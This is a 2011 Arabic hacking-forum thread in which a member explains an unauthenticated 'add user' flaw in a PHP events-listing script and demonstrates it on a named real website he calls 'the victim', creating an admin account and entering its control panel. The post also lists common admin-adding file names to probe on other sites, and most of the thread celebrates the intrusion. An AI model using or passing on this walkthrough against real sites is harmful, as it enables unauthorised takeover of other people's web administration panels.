التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
تحديث الصفحة =>|| شرح + استغلال ثغرآت الـ Add Admin
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-29-2011, 04:57 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 
 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road
.... =>|| شرح + استغلال ثغرآت الـ Add Admin

السلآم عليكم


كيفكم ياشبآب ؟

اليوم درسنآ بيكون تطبيق مبآشر على ثغرة add user

تحصلوها على الرآبط التآلي :
http://www.exploit-db.com/exploits/10515/

الثغرة في سكربت : Basic php-events lister2


=================================


The exploit :
Get in :

http://localhost/path/admin/add_user.php

and add your user ..

Example : r7e@hotmail.com - 123456

Then get in :

http://localhost/path/admin/login.php

=================================



------------------------------------------

شرح exploit

يعني الاستغلال

http://localhost/path/admin/add_user.php

http://localhost <<< الموقع المصاب
/path/ <<< الملف المصاب
admin <<< مجلد الآدمن او لوحتة الادارة ...
/add_user.php <<< من اسمووووا ضاهر شو بيعمل
اضافة يوزر جديد


------------------------------------------

################################################## ###

انا جبت الضحيه


http://easttexassolutions.com/events


نجي للتطبيق !

http://easttexassolutions.com/events

بعدها الى هنا

admin/add_user.php


يعني هيك

http://easttexassolutions.com/events/admin/add_user.php

الآن ادخل ايمايلك + الباس

^_^

username and password successfuly inserted!

Login successful!

بعدها

http://easttexassolutions.com/events/admin

get your msn + pass ...



الآن انت داخل لوحة تحكم الآدمن

:D

################################################## ###


*************************************************

تم استغلآل الثغرة بنجآح

ملاحضة مهمة :

بآقلكم ثغرآت الـ Add Admin عآدة لها ملفآت محدده ووآضحه

مثل

addadmin.php

add_admin.php

admin_add.php

user_add.php

add_user.php

...

وعآدة تكون ورآ لوحة التحكم ADMIN or cpanel ...



تغرة جميلة ؟

:love:


///////////////////////////////////////////////



طريقة الترقيع بسيطة وهي حذف ملف add_user.php or ...








=>|| avp + hsjyghg eyvNj hgJ Add Admin add user

التعديل الأخير تم بواسطة KaLa$nikoV ; 05-29-2011 الساعة 09:28 PM.

   

رد مع اقتباس
قديم 05-29-2011, 05:42 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 
 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road
افتراضي

آسف على التقصير في الشرح، ان شاء الله شرح فيديوا، في انتضار نزول تغرات جديدة من هذا النوع

   

رد مع اقتباس
قديم 05-29-2011, 05:42 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية k4$p3r-MA
 

 
 
إحصائية العضو








k4$p3r-MA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
k4$p3r-MA is on a distinguished road
افتراضي

ههههه مشكور اخي نور الدين

التوقيع

http://www.cafe-hbal.com/up/uploads/13369618701.gif

دعواتكم معنا بالنجاح و لجميع المسلمين
Yes I we will bE BaCk 2013

 

   

رد مع اقتباس
قديم 05-29-2011, 05:54 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
Hαcĸer'ѕ Kιɴɢ
:: Interactive Developer ::
 
الصورة الرمزية Hαcĸer'ѕ Kιɴɢ
 

 
 
إحصائية العضو








Hαcĸer'ѕ Kιɴɢ غير متواجد حالياً

إرسال رسالة عبر MSN إلى Hαcĸer'ѕ Kιɴɢ

 

 

إحصائية الترشيح

عدد النقاط : 10
Hαcĸer'ѕ Kιɴɢ is on a distinguished road
افتراضي

تسلم أخي نوردين
إن شاء الله يستفيد منها الأعضاء
في أمان الله

التوقيع

** إن مرت الايام ولم تروني فهذه مشاركاتي فـتذكروني

 وان غبت ولم تجدوني اكون وقتها بحاجه للدعاء فادعولي **

 

   

رد مع اقتباس
قديم 05-29-2011, 06:09 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 
 
إحصائية العضو




 

 
افتراضي

بارك الله فيك

   

رد مع اقتباس
قديم 05-29-2011, 06:12 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 
 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road
افتراضي

مشكورين يا احلا اعضاء

   

رد مع اقتباس
قديم 05-29-2011, 08:14 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي

ابداع

ما قصرت

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 05-29-2011, 09:29 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 
 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road
افتراضي

^_^

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
add user

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 06:28 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0